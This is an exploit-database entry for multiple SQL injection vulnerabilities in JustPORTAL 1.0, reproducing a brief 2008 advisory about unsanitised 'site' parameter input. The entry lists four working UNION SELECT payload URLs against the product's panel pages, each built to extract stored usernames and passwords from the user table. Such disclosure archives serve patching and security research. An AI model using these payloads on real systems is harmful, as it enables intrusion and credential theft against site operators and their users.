JustPORTAL 1.0 - 'site' Parameter Multiple SQL Injection Vulnerabilities

2008-05-29T00:00:00
ID EDB-ID:31859
Type exploitdb
Reporter Ugurcan Engin
Modified 2008-05-29T00:00:00

Description

JustPORTAL 1.0 'site' Parameter Multiple SQL Injection Vulnerabilities. Webapps exploit for asp platform

                                        
                                            source: http://www.securityfocus.com/bid/29426/info

JustPORTAL is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

JustPORTAL 1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/lab/JustPORTALv1.0/panel/videogit.asp?site=1+union+select+0,(sifre),kullaniciadi,3,4,5+from+uyeler
http://www.example.com/lab/JustPORTALv1.0/panel/resimgit.asp?site=1+union+select+0,sifre,kullaniciadi,3,4+from+uyeler
http://www.example.com/lab/JustPORTALv1.0/panel/menugit.asp?site=1+union+select+0,sifre,kullaniciadi+from+uyeler
http://www.example.com/lab/JustPORTALv1.0/panel/habergit.asp?site=1+union+select+0,sifre,kullaniciadi,3,4+from+uyeler